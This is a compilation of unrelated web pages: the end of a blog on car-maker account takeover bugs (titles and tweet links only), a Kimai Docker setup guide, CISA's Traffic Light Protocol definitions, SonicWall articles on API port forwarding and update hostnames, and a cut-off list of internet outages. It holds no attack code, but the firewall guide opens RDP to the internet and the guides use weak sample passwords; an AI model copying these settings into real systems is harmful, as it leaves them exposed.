(7) Full Remote Vehicle Access and Full Account Takeover affecting Honda, Nissan, Infiniti, Acura

This vulnerability was written up on Twitter and can be accessed on the following thread:

https://platform.twitter.com/embed/Tweet.html?dnt=true&embedId=twitter-widget-1&features=eyJ0ZndfdGltZWxpbmVfbGlzdCI6eyJidWNrZXQiOlsibGlua3RyLmVlIiwidHIuZWUiLCJ0ZXJyYS5jb20uYnIiLCJ3d3cubGlua3RyLmVlIiwid3d3LnRyLmVlIiwid3d3LnRlcnJhLmNvbS5iciJdLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2hvcml6b25fdGltZWxpbmVfMTIwMzQiOnsiYnVja2V0IjoidHJlYXRtZW50IiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9lZGl0X2JhY2tlbmQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3JlZnNyY19zZXNzaW9uIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2J1c2luZXNzX3ZlcmlmaWVkX2JhZGdlIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19jaGluX3BpbGxzXzE0NzQxIjp7ImJ1Y2tldCI6ImNvbG9yX2ljb25zIiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9yZXN1bHRfbWlncmF0aW9uXzEzOTc5Ijp7ImJ1Y2tldCI6InR3ZWV0X3Jlc3VsdCIsInZlcnNpb24iOm51bGx9LCJ0ZndfbWl4ZWRfbWVkaWFfMTU4OTciOnsiYnVja2V0IjoidHJlYXRtZW50IiwidmVyc2lvbiI6bnVsbH0sInRmd19zZW5zaXRpdmVfbWVkaWFfaW50ZXJzdGl0aWFsXzEzOTYzIjp7ImJ1Y2tldCI6ImludGVyc3RpdGlhbCIsInZlcnNpb24iOm51bGx9LCJ0ZndfZXhwZXJpbWVudHNfY29va2llX2V4cGlyYXRpb24iOnsiYnVja2V0IjoxMjA5NjAwLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2R1cGxpY2F0ZV9zY3JpYmVzX3RvX3NldHRpbmdzIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd192aWRlb19obHNfZHluYW1pY19tYW5pZmVzdHNfMTUwODIiOnsiYnVja2V0IjoidHJ1ZV9iaXRyYXRlIiwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2JsdWVfdmVyaWZpZWRfYmFkZ2UiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2xlZ2FjeV90aW1lbGluZV9zdW5zZXQiOnsiYnVja2V0IjpmYWxzZSwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2dvdl92ZXJpZmllZF9iYWRnZSI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0Zndfc2hvd19idXNpbmVzc19hZmZpbGlhdGVfYmFkZ2UiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3R3ZWV0X2VkaXRfZnJvbnRlbmQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfX0%3D&frame=false&hideCard=false&hideThread=false&id=1597792097175674880&lang=en&origin=https%3A%2F%2Fsamcurry.net%2Fweb-hackers-vs-the-auto-industry%2F&sessionId=53b9ca9842ac4a0ce6fd39e82f4b1bd614f85d70&theme=light&widgetsVersion=a3525f077c700%3A1667415560940&width=550px

(8) Full Vehicle Takeover on Nissan via Mass Assignment

This vulnerability was written up on Twitter and can be accessed on the following thread:

https://platform.twitter.com/embed/Tweet.html?dnt=true&embedId=twitter-widget-2&features=eyJ0ZndfdGltZWxpbmVfbGlzdCI6eyJidWNrZXQiOlsibGlua3RyLmVlIiwidHIuZWUiLCJ0ZXJyYS5jb20uYnIiLCJ3d3cubGlua3RyLmVlIiwid3d3LnRyLmVlIiwid3d3LnRlcnJhLmNvbS5iciJdLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2hvcml6b25fdGltZWxpbmVfMTIwMzQiOnsiYnVja2V0IjoidHJlYXRtZW50IiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9lZGl0X2JhY2tlbmQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3JlZnNyY19zZXNzaW9uIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2J1c2luZXNzX3ZlcmlmaWVkX2JhZGdlIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19jaGluX3BpbGxzXzE0NzQxIjp7ImJ1Y2tldCI6ImNvbG9yX2ljb25zIiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9yZXN1bHRfbWlncmF0aW9uXzEzOTc5Ijp7ImJ1Y2tldCI6InR3ZWV0X3Jlc3VsdCIsInZlcnNpb24iOm51bGx9LCJ0ZndfbWl4ZWRfbWVkaWFfMTU4OTciOnsiYnVja2V0IjoidHJlYXRtZW50IiwidmVyc2lvbiI6bnVsbH0sInRmd19zZW5zaXRpdmVfbWVkaWFfaW50ZXJzdGl0aWFsXzEzOTYzIjp7ImJ1Y2tldCI6ImludGVyc3RpdGlhbCIsInZlcnNpb24iOm51bGx9LCJ0ZndfZXhwZXJpbWVudHNfY29va2llX2V4cGlyYXRpb24iOnsiYnVja2V0IjoxMjA5NjAwLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2R1cGxpY2F0ZV9zY3JpYmVzX3RvX3NldHRpbmdzIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd192aWRlb19obHNfZHluYW1pY19tYW5pZmVzdHNfMTUwODIiOnsiYnVja2V0IjoidHJ1ZV9iaXRyYXRlIiwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2JsdWVfdmVyaWZpZWRfYmFkZ2UiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2xlZ2FjeV90aW1lbGluZV9zdW5zZXQiOnsiYnVja2V0IjpmYWxzZSwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2dvdl92ZXJpZmllZF9iYWRnZSI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0Zndfc2hvd19idXNpbmVzc19hZmZpbGlhdGVfYmFkZ2UiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3R3ZWV0X2VkaXRfZnJvbnRlbmQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfX0%3D&frame=false&hideCard=false&hideThread=false&id=1597984481511903234&lang=en&origin=https%3A%2F%2Fsamcurry.net%2Fweb-hackers-vs-the-auto-industry%2F&sessionId=53b9ca9842ac4a0ce6fd39e82f4b1bd614f85d70&theme=light&widgetsVersion=a3525f077c700%3A1667415560940&width=550px

Credits

The following people contributed towards this project:

Special thanks to the following people who helped create this blog post:

Source :
https://samcurry.net/web-hackers-vs-the-auto-industry/

How To Install Kimai Time Tracking App in Docker

In this guide, I’ll show you how to deploy the open source time tracking app Kimai in a Docker container. Kimai is free, browser-based (so it’ll work on mobile devices), and is extremely flexible for just about every use case.

It has a stopwatch feature where you can start/stop/pause a worklog timer. Then, it accumulates the total into daily, weekly, monthly or yearly reports, which can be exported or printed as invoices.

It supports single or multi users, so you can even track time for your entire department. All statistics are visible on a beautiful dashboard, which makes historical time-tracking a breeze.


Why use Kimai Time Tracker?

For my scenario, I am salaried at work. However, since I’m an IT Manager, I often find myself working after hours or on weekends to patch servers, reboot systems, or perform system and infrastructure upgrades. Normally, I use a pen and paper or a notetaking app to track overtime, although this is pretty inefficent. Sometimes I forget when I started or stopped, or if I’ve written down the time on a notepade at home, I can’t view that time at work.

And when it comes to managing a team of others who also perform after hours maintenance, it becomes even harder to track their total overtime hours.

Over the past few weeks, I stumbled across Kimai and really love all the features. Especially when I can spin it up in a docker or docker compose container!

If you don’t have Docker installed, follow this guide: https://smarthomepursuits.com/how-to-install-docker-ubuntu/

If you don’t have Docker-Compose installed, follow this guide: https://smarthomepursuits.com/how-to-install-portainer-with-docker-in-ubuntu-20-04/

In this tutorial, we will be installing Kimai for 1 user using standard Docker run commands. Other users can be added from the webui after initial setup.


Step 1: SSH into your Docker Host

Open Putty and SSH into your server that is running docker and docker compose.


Step 2: Create Kimai Database container

Enter the command below to create a new database to use with Kimai. You can copy and paste into Putty by right-clicking after copy, or CTRL+SHIFT+V into other ssh clients.

sudo docker run --rm --name kimai-mysql \
    -e MYSQL_DATABASE=kimai \
    -e MYSQL_USER=kimai \
    -e MYSQL_PASSWORD=kimai \
    -e MYSQL_ROOT_PASSWORD=kimai \
    -p 3399:3306 -d mysql

Step 3: Start Kimai

Next, start the Kimai container using the already created database. If you look at the Kimai github page, you’ll notice that this isn’t the same command as what shows there.

Here’s the original command (which I’m not using):

docker run --rm --name kimai-test -ti -p 8001:8001 -e DATABASE_URL=mysql://kimai:kimai@${HOSTNAME}:3399/kimai kimai/kimai2:apache

And here’s my command. I had to explicitly add TRUSTED_HOSTS, the ADMINMAIL and ADMINPASS, and change the ${HOSTNAME} to the IP address of your docker host. Otherwise, I wasn’t able to access Kimai from other computers on my local network.

  • Green = change port here if already in use
  • Red = Add the IP address of your docker host
  • Orange = Manually specifying the admin email and password. This is what you’ll use to log in with.
  • Blue = Change to docker host IP address
sudo docker run --rm --name kimai -ti -p 8001:8001 -e TRUSTED_HOSTS=192.168.68.141,localhost,127.0.0.1 -e ADMINMAIL=example@gmail.com -e ADMINPASS=8charpassword -e DATABASE_URL=mysql://kimai:kimai@192.168.68.141:3399/kimai kimai/kimai2:apache

Note that 8 characters is the minimum for the password.


Step 4: Log In via Web Browser

Next, Kimai should now be running!

To check, you can go to your http://dockerIP:8001 in a web browser (192.168.68.141:8001)

Then simply log in with the credentials you created.


Step 5: Basic Setup

This app is extremely powerful and customizeable, so I won’t be going over all the available options since everyone has different needs.

Like I mentioned earlier, I’m using Kimai for overtime tracking only, so the first step for me is to create a new “customer”.

Create a Customer

This is sort of unintuitive, but you need to create a customer before you can start tracking time to a project. I’m creating a generic “Employee” customer.

Click Customers on the left sidebar, then click the + button in the top right corner.

Create A Project

Click Projects on the left sidebar:

Then click the + button in the top right corner.

Add a name, choose the customer you just created, and then choose a date range.

Create An Activity

Click Activity on the left, then create an activity. I’m calling mine Overtime Worked and assigning it to the Project “Overtime 2021” I just created.


Step 6: Change “Timetracking Mode” to Time-clock

Click Settings. Under Timetracking mode, change it to Time-Clock. This will let you click the Play button to start/stop time worked vs having to manually enter start and stop times.


Step 7: Start Tracking Time!

To start tracking time, simply click the timer widget in the top right corner.

A screen will pop up asking you what project and activity you want to apply the time to.

The selfhosted stopwatch will start tracking time right after. You can then view the timesheets for yourself under the My Times section or for all users under the Timesheets or Reporting tabs.


Wrapping Up

Hopefully this guide helped you get Kimai installed and setup! If you have any questions, feel free to let me know in the comments below and I’ll do my best to help you out.


My Homelab Equipment

Here is some of the gear I use in my Homelab. I highly recommend each of them.

The full list of server components I use can be found on my Equipment List page.

Source :
https://smarthomepursuits.com/how-to-install-kimai-time-tracking-app-in-docker/

Traffic Light Protocol (TLP) Definitions and Usage

CISA currently uses Traffic Light Protocol (TLP) according to the FIRST Standard Definitions and Usage Guidance — TLP Version 2.0Note: On Nov. 1, 2022, CISA officially adopted TLP 2.0; however, CISA’s Automated Indicator Sharing (AIS) capability will not update from TLP 1.0 to TLP 2.0 until March 2023. This exception includes AIS’s use of the following open standards: the Structured Threat Information Expression (STIX™) for cyber threat indicators and defensive measures information and the Trusted Automated Exchange of Intelligence Information (TAXII™) for machine-to-machine communications.

In addition to the FIRST TLP 2.0 webpage, see CISA’s:

Collapse All Sections

What is TLP?

The Traffic Light Protocol (TLP) was created in order to facilitate greater sharing of information. TLP is a set of designations used to ensure that sensitive information is shared with the appropriate audience. It employs five official marking options to indicate expected sharing boundaries to be applied by the recipient(s). TLP only has five marking options; any designations not listed in this standard are not considered valid by FIRST.

TLP provides a simple and intuitive schema for indicating when and how sensitive information can be shared, facilitating more frequent and effective collaboration. TLP is not a “control marking” or classification scheme. TLP was not designed to handle licensing terms, handling and encryption rules, and restrictions on action or instrumentation of information. TLP labels and their definitions are not intended to have any effect on freedom of information or “sunshine” laws in any jurisdiction.

TLP is optimized for ease of adoption, human readability and person-to-person sharing; it may be used in automated sharing exchanges, but is not optimized for that use.

TLP is distinct from the Chatham House Rule (when a meeting, or part thereof, is held under the Chatham House Rule, participants are free to use the information received, but neither the identity nor the affiliation of the speaker(s), nor that of any other participant, may be revealed.), but may be used in conjunction if it is deemed appropriate by participants in an information exchange.

The source is responsible for ensuring that recipients of TLP information understand and can follow TLP sharing guidance.

If a recipient needs to share the information more widely than indicated by the original TLP designation, they must obtain explicit permission from the original source.

How do I determine appropriate TLP designation?

ColorWhen should it be used?How may it be shared?
 TLP:RED 
TLP:RED
Not for disclosure, restricted to participants only.
Sources may use TLP:RED when information cannot be effectively acted upon without significant risk for the privacy, reputation, or operations of the organizations involved. For the eyes and ears of individual recipients only, no further.Recipients may not share TLP:RED information with any parties outside of the specific exchange, meeting, or conversation in which it was originally disclosed. In the context of a meeting, for example, TLP:RED information is limited to those present at the meeting. In most circumstances, TLP:RED should be exchanged verbally or in person.
 TLP:AMBER+STRICT 
TLP:AMBER
Limited disclosure, restricted to participants’ organization.
Sources may use TLP:AMBER+STRICT when information requires support to be effectively acted upon, yet carries risk to privacy, reputation, or operations if shared outside of the organization.Recipients may share TLP:AMBER+STRICT information only with members of their own organization on a need-to-know basis to protect their organization and prevent further harm.
 TLP:AMBER 
TLP:AMBER
Limited disclosure, restricted to participants’ organization and its clients (see Terminology Definitions).
Sources may use TLP:AMBER when information requires support to be effectively acted upon, yet carries risk to privacy, reputation, or operations if shared outside of the organizations involved. Note that TLP:AMBER+STRICT should be used to restrict sharing to the recipient organization only. Recipients may share TLP:AMBER information with members of their own organization and its clients on a need-to-know basis to protect their organization and its clients and prevent further harm.
 TLP:GREEN 
TLP:GREEN
Limited disclosure, restricted to the community.
Sources may use TLP:GREEN when information is useful to increase awareness within their wider community.Recipients may share TLP:GREEN information with peers and partner organizations within their community, but not via publicly accessible channels. Unless otherwise specified, TLP:GREEN information may not be shared outside of the cybersecurity or cyber defense community.
 TLP:CLEAR 
TLP:WHITE
Disclosure is not limited.
Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release.Recipients may share this information without restriction. Information is subject to standard copyright rules.

TLP 2.0 Terminology Definitions

Community

Under TLP, a community is a group who share common goals, practices, and informal trust relationships. A community can be as broad as all cybersecurity practitioners in a country (or in a sector or region).

Organization

Under TLP, an organization is a group who share a common affiliation by formal membership and are bound by common policies set by the organization. An organization can be as broad as all members of an information sharing organization, but rarely broader.

Clients

Under TLP, clients are those people or entities that receive cybersecurity services from an organization. Clients are by default included in TLP:AMBER so that the recipients may share information further downstream in order for clients to take action to protect themselves. For teams with national responsibility, this definition
includes stakeholders and constituents. Note: CISA considers “clients” to be stakeholders and constituents that have a legal agreement with CISA.

Usage

How to use TLP in email

TLP-designated email correspondence should indicate the TLP color of the information in the Subject line and in the body of the email, prior to the designated information itself. The TLP color must be in capital letters: TLP:RED, TLP:AMBER+STRICT, TLP:AMBER, TLP:GREEN, or TLP:WHITE.

How to use TLP in documents

TLP-designated documents should indicate the TLP color of the information in the header and footer of each page. To avoid confusion with existing control marking schemes, it is advisable to right-justify TLP designations. The TLP color should appear in capital letters and in 12 point type or greater. Note: TLP 2.0 has changed the color coding of TLP:RED to accomodate individuals with low vision.

RGB:
TLP:RED : R=255, G=43, B=43, background: R=0, G=0, B=0
TLP:AMBER : R=255, G=192, B=0, background: R=0, G=0, B=0
TLP:GREEN : R=51, G=255, B=0, background: R=0, G=0, B=0
TLP:WHITE : R=255, G=255, B=255, background: R=0, G=0, B=0

CMYK:
TLP:RED : C=0, M=83, Y=83, K=0, background: C=0, M=0, Y=0, K=100
TLP:AMBER : C=0, M=25, Y=100, K=0, background: C=0, M=0, Y=0, K=100
TLP:GREEN : C=79, M=0, Y=100, K=0, background: C=0, M=0, Y=0, K=100
TLP:WHITE : C=0, M=0, Y=0, K=0, background: C=0, M=0, Y=0, K=100

Source :
https://www.cisa.gov/tlp

Port Forwarding configured using SonicOS API

Description

This article describes the steps involved in creating Polices using SonicOS APIs that will let you access internal devices or servers behind the SonicWall firewall.

Cause

SonicWall by default does not allow inbound traffic which not a part of a session that was initiated by an internal device on the network. This is done to protect the devices in the internal network from malicious access. If required certain parts of the network can be opened to external access, for example Webservers, Exchange servers and so on.

To open the network, we need to specify an access rule from the external network to the internal network and a NAT Policy so we direct traffic only to the intended device.

With APIs this can be achieved on scale for example you can create multiple Access Rules and NAT policies with one command and all the attributes can be specified into Json Objects.

Resolution

Manually opening Ports / enabling Port forwarding to allow traffic from the Internet to a Server behind the SonicWall using sonicos API involves the following steps:

Step1: Enabling the API Module.

Step2:Getting into Swagger.

Step3:Login to the SonicWall with API.

Step4:Create Address Objects and Service Objects with API.

Step5:Creating NAT Policy with API.

Step6: Creating Access Rules with API.

Step7:Committing all the configurational changes made with APIs.

Step8: Log out the SonicWall with API:

Scenario Overview

The following walk-through details allowing TCP 3389 From the Internet to a Terminal Server on the Local Network.Once the configuration is complete, Internet Users can RDP into the Terminal Server using the WAN IP address.Although the examples below show the LAN Zone and TCP 3389 they can apply to any Zone and any Port that is required.

Step 1: Enabling the API Module:               
 

  1.  Log into the SonicWall GUI.
  2.  Click Manage in the top navigation menu.
  3. Click Appliance | Base Settings
  4. Under Base Settings search for sonicos API
  5. Click Enable sonicos API  
  6. Click Enable RFC-2617 HTTP Basic Access authentication
Enabling API on the SonicOS

Step2: Getting into Swagger

  1. Click on the Mange Tab
  2. Scroll Down to find API
  3. Click on the Link https://sonicos-api.sonicwall.com
  4. Swagger will prepopulate your SonicWalls’s IP, MGMT Port, Firmware so it can give you a list of applicable APIs.

 NOTE: All the APIs required for configuring Port Forwarding will be listed in this Article.

API on the SonicOS

Step3:Login to the SonicWall with API:

  1.  curl -k -i -u “admin:password” -X POST https://192.168.168.168:443/api/sonicos/auth

      “admin:password” – Replace this with your SonicWalls username : password

      https://192.168.168.168:443/– Replace this with your SonicWalls Public or private IP address

Command Output should contain a string: “success”: true

Login with API

 NOTE: You are free to choose Swagger, Postman, Git bash or any application that allows API calls, if you are using a Linux based operating system you can execute cURL from the terminal.For this article I am using Git bash on Windows.

Step4:Create Address Objects and Service Objects with API:

  1.   curl -k -i -X POST “https://192.168.168.168:443/api/sonicos/address-objects/ipv4” -H “accept: application/Json” -H “Content-Type: application/Json” -d “{\”address_object\”:{\”ipv4\”:{\”name\”:\”Term Server Private\”,\”zone\”:\”LAN\”,\”host\”:{\”ip\”:\”192.168.168.10\”}}}}”  &&  curl -k -i -X POST “https://192.168.168.168:443/api/sonicos/address-objects/ipv4” -H “accept: application/Json” -H “Content-Type: application/Json” -d “{\”address_object\”:{\”ipv4\”:{\”name\”:\”Term Server Public\”,\”zone\”:\”WAN\”,\”host\”:{\”ip\”:\”1.1.1.1\”}}}}”

 OR 

curl -k -i -X POST “https://192.168.168.168:443/api/sonicos/address-objects/ipv4” -H “accept: application/Json” -H “Content-Type: application/Json” -d @add.Json

@add.Json is a file with the following information:

{
“address_objects”: [
{
“ipv4”: {
“name”: “Term Server Private”,
“zone”: “LAN”,
“host”: {
“ip”: “192.168.168.10”
}
}
},
{
“ipv4”: {
“name”: “Term Server Public”,
“zone”: “WAN”,
“host”: {
“ip”: “1.1.1.1”
}
}
}
]
}

Output of the First command where we have parsed the address object data on the command instead of creating a separate File:

Image

 Output of the second Command where we have used a file called @add instead of specifying data on the command:

Image

 TIP: If you are creating only one Address Object then the First command should be sufficient, if you are creating multiple address objects then the second command should be used.

 CAUTION: I have the add.Json file saved on to my desktop and hence I was able to call it into the command, if you have created the Json the file in a different location then make sure you are executing the command from that location.

2. Adding Service Object:

 curl -k -i -X POST “https://192.168.168.168:443/api/sonicos/service-objects” -H “accept: application/Json” -H “Content-Type: application/Json” -d @serviceobj.Json

https://192.168.168.168:443 – Replace that with the IP of the SonicWall

@serviceobj.Json is a file that contains the Attributes of the service object:

{

  “service_object”: {

    “name”: “Terminal Server 3389”,

    “TCP”: {

      “begin”: 3389,

      “end”: 3389

    }

  }

}

Output of the command:

Image

 3. Committing the changes made to the SonicWall: We need to do this to be able to use the Address Objects and service objects that we just created to make a NAT Policy and an Access Rule.

  curl -k -X POST “https://192.168.168.168:443/api/sonicos/config/pending” -H “accept: application/Json”

  https://192.168.168.168:443 – Replace that with the IP of the SonicWall

Output of the command: 

Image

Step5: Creating NAT Policy with API:

1.     curl -k -i -X POST “https://192.168.168.168:443/api/sonicos/nat-policies/ipv4” -H “accept: application/Json” -H “Content-Type: application/Json” -d @natpolicy.Json

         https://192.168.168.168:443 – Replace that with the IP of the SonicWall

         @natpolicy.Json is a file that contains the Attributes of the NAT Policy:

{

  “nat_policies”: [

    {

      “ipv4”: {

        “name”: “Inbound NAT 3389”,

        “enable”: true,

        “comment”: “”,

        “inbound”: “X1”,

        “outbound”: “any”,

        “source”: {

          “any”: true

        },

        “translated_source”: {

          “original”: true

        },

        “destination”: {

          “name”: “Term Server Public”

        },

        “translated_destination”: {

          “name”: “Term Server Private”

        },

        “service”: {

          “name”: “Terminal Server 3389”

        },

        “translated_service”: {

          “original”: true

        }

      }

    }

  ]

}

Output of the command:

Image

Step6: Creating Access Rules with API:

1.     curl -k -X POST “https://192.168.168.168:443/api/sonicos/access-rules/ipv4” -H “accept: application/Json” -H “Content-Type: application/Json” -d @accessrule.Json

https://192.168.168.168:443 – Replace that with the IP of the SonicWall

@accessrule.Json is a file that contains the Attributes of the access rule:

{

  “access_rules”: [

    {

      “ipv4”: {

        “name”: “Inbound 3389”,

        “enable”: true,

        “from”: “WAN”,

        “to”: “LAN”,

        “action”: “allow”,

        “source”: {

          “address”: {

            “any”: true

          },

          “port”: {

            “any”: true

          }

        },

        “service”: {

          “name”: “Terminal Server 3389”

        },

        “destination”: {

          “address”: {

            “name”: “Term Server Public”

          }

        }

        }

    }

  ]

}

Output of the command:

Image

Step7: Committing all the configurational changes made with APIs:

1.     We have already committed Address objects and Service Objects in Step 4, In this step we are committing the NAT Policy and the Access Rule to the SonicWalls configuration:

curl -k -X POST “https://192.168.168.168:443/api/sonicos/config/pending” -H “accept: application/Json”

https://192.168.168.168:443 – Replace that with the IP of the SonicWall

We have Only used the POST method in most of the API calls for this Article because we are only Adding things into the configuration, there are other methods Like GET,DELETE,PUT and etc. I recommend that you go through https://sonicos-api.sonicwall.com for more API commands.

Step8: Log out the SonicWall with API:

1.       It is recommended to log out from the SonicWall via API once the desired configuration is committed.

         curl -k -i -u “admin:password” -X DELETE https://192.168.168.168:443/api/sonicos/auth

         https://192.168.168.168:443 – Replace that with the IP of the SonicWall

         “admin:password” – is the actual username and password for the SonicWall.

Output of the command:

Image

 CAUTION: Caution: If you miss to perform the action in Step 7 and Execute the command in Step 8 you will lose all the configuration changes made in the current session.

Summary:We have successfully configured a Port Forwarding for a user in the Internet to access a Term Server that is behind a Firewall on port 3389 using sonicos API.

 NOTE: It is always recommended to use Client VPN for RDP connections this article here is just an example.

Related Articles

Categories

Source :
https://www.sonicwall.com/support/knowledge-base/port-forwarding-with-sonicos-api-using-postman-and-curl/190224162643523/

What FQDN’s and IP’s are used by SonicWall products to update their services?

Description

This article lists the Fully Qualified Domain Names (FQDNs) in use by SonicWall for its licensing and security services.

Resolution

SonicWall firewalls:

  • lm2.sonicwall.com – Registration information/licensing.
  • licensemanager.sonicwall.com – Registration information/licensing for older firewalls.
  • software.sonicwall.com – Softwares, firmwares, NetExtender, GVC.
  • responder.global.sonicwall.com – Probe target.
  • clientmanager.sonicwall.com – Client CF enforcement download.
  • policymanager.sonicwall.com – Global Security Client.
  • convert.global.sonicwall.com – Preference processor server.
  • geodnsd.global.sonicwall.com – Used for flow reporting and GeoIP.
  • webcfs00.global.sonicwall.com – Content filter server.
  • webcfs01.global.sonicwall.com – Content filter server.
  • webcfs02.global.sonicwall.com – Content filter server.
  • webcfs03.global.sonicwall.com – Content filter server.
  • webcfs04.global.sonicwall.com – Content filter server.
  • webcfs05.global.sonicwall.com – Content filter server.
  • webcfs06.global.sonicwall.com – Content filter server.
  • webcfs07.global.sonicwall.com – Content filter server.
  • webcfs08.global.sonicwall.com – Content filter server.
  • webcfs10.global.sonicwall.com – Content filter server.
  • webcfs11.global.sonicwall.com – Content filter server.
  • gcsd.global.sonicwall.com – Cloud antivirus and status.
  • sig2.sonicwall.com – Signature updates.
  • sigserver.global.sonicwall.com – Signature updates for older firewalls.
  • lmdashboard.global.sonicwall.com – License manager dashboard.
  • appreports.global.sonicwall.com – App reports server.
  • sonicsandbox.global.sonicwall.com – Default Capture ATP server (west coast) UDP 2259, and https (tcp 443).
  • sonicsandboxmia.global.sonicwall.com  – East coast capture ATP server UDP 2259, and https (tcp 443).
  • utmgbdata.global.sonicwall.com – Map info URL domain.
  • cfssupport.sonicwall.com – View rating of a website.
  • cloudtt.global.sonicwall.com – Zero Touch provisioning
  • eprs2.global.sonicwall.com (204.212.170.36, 204.212.170.11, 204.212.170.10) – Content Filter Client servers.
  • wsdl.mysonicwall.com  – Automatic preference backups and firmware downloads.
  • sonicsandbox.global.sonicwall.com
  • sonicsandboxmia.global.sonicwall.com
  • sonicsandboxams.global.sonicwall.com
  • sonicsandboxfra.global.sonicwall.com
  • sonicsandboxtko.global.sonicwall.com

    This information can also be found in the Tech Support Report (TSR). More information about the TSR can be found in the following article:
    How to Download Tech Support Files (TSR, EXP, Logs) From SonicWall UTM Firewalls

Capture Client software:

  • captureclient-36.sonicwall.com
  • captureclient.sonicwall.com
  • sonicwall.sentinelone.net (S1 agent)
  • software.sonicwall.com (software package updates)
  • sonicsandbox.global.sonicwall.com (Capture ATP- Applicable for Capture Client Advanced License)

SonicWall CSC:

  • For SanJose Colo

    FQDN: cloudgms.sonicwall.com
    Zero Touch FQDN: cloudtt.global.sonicwall.com
    IP: 4.16.47.168, 4.16.47.188

  • For AWS Colo

    FQDN: cscma.sonicwall.com
    Zero Touch FQDN: cscmatt.global.sonicwall.com
    IP: 34.211.138.110, 52.37.12.168, 52.89.82.203, 52.11.92.114

  • For AMS Colo

    FQDN: cloudgmsams.sonicwall.com
    Zero Touch FQDN: cloudttams.global.sonicwall.com
    IP: 213.244.188.168, 213.244.188.188

  • For AWS-FRA Colo

    FQDN: cscmafra.sonicwall.com
    Zero Touch FQDN: cscmafratt.global.sonicwall.com, cscmafratta.global.sonicwall.com
    IP: 18.197.234.66, 18.197.234.59

SonicWall NSM:

  • For Oregon AWS Colo

    FQDN: nsm-uswest.sonicwall.com (Use it in GMS settings under Administration Page)
    Zero Touch FQDN: nsm-uswest-zt.sonicwall.com (Use it in ZeroTouch Settings under Diag page)
    IP: 13.227.130.81, 13.227.130.63, 3.227.130.69, 13.227.130.12, 52.39.29.75, 44.233.105.101, 44.227.248.206

  • For AWS-FRA Colo

    FQDN: nsm-eucentral.sonicwall.com (Use it in GMS settings under Administration Page)
    Zero Touch FQDN: nsm-eucentral-zt.sonicwall.com (Use it in ZeroTouch Settings under Diag page)
    IP: 13.227.130.70, 13.227.130.69, 13.227.130.15, 13.227.130.92, 18.156.16.24, 18.157.240.148, 3.127.176.56

Related Articles

Categories

Source :
https://www.sonicwall.com/support/knowledge-base/what-fqdn-s-and-ip-s-are-used-by-sonicwall-products-to-update-their-services/170503941664663/

The 12 Most Impactful Internet Outages

An internet outage can have major consequences for a digital business, especially when it happens during peak usage times and on holidays. Outages can lead to revenue loss, complaints, and customer churn. 

Of course, internet outages regularly impact companies across all verticals, including some of the largest internet companies in the world. And they can happen when you least expect them. 

Read on to learn about some of the most impactful internet outages to date and some steps you can take to keep your business out of harm’s way.

Historical Internet Outages You Need to Know About 

1. Amazon Web Services 

Amazon Web Services (AWS) experienced a major outage in December 2021, lasting for several hours. The outage impacted operations for many leading businesses, including Netflix, Disney, Spotify, DoorDash, and Venmo. 

Amazon blames the outage on an automation error causing multiple systems to act abnormally. The outage also prevented users from accessing some cloud services. 

This outage proved the largest and safest cloud providers are also susceptible to downtime.

2. Facebook 

Facebook as well suffered a major outage in 2021, leaving billions of users unable to access its services, including its main social network, Instagram, and WhatsApp. 

According to Facebook, the cause of the outage was a configuration change on its backbone routers responsible for transmitting traffic across its data centers. The outage lasted roughly six hours, an eternity for a social network.

3. Fastly 

Cloud service provider Fastly had its network go down in June 2021, taking down several sizeable global news websites, including the New York Times and CNN. It also impacted retailers like Target and Amazon, and several other organizations.

The outage resulted from a faulty software update, stemming from a misconfiguration, causing disruptions across multiple servers.  

4. British Airways 

British Airways experienced a massive IT failure in 2017 during one of the busiest travel weekends in the United Kingdom. 

This event created a nightmare scenario for the organization and its customers. Altogether, it grounded 672 flights and stranded tens of thousands of customers.

According to the company, the outage ensued when an engineer disconnected the data center’s power supply. A massive power surge came next, bringing the business’s network down in the process.

5. Google

Google had a major service outage in 2020. It only lasted about forty-five minutes, but it still impacted users worldwide. 

Services including Gmail, YouTube, and Google Calendar all crashed. So did Google Home apps. The outage also impacted third-party applications using Google for authentication.

The issue happened due to inadequate storage capacity for the company’s authentication services.

6.  Dyn

Undoubtedly, one of the biggest distributed denial of service (DDoS) attacks in history occurred in 2016 against Dyn, which was a major backbone provider.

The attack occurred in three waves, overwhelming the company’s servers. As a result, many internet users were unable to access partnering platforms like Twitter, Spotify, and Netflix. 

7. Verizon Fios

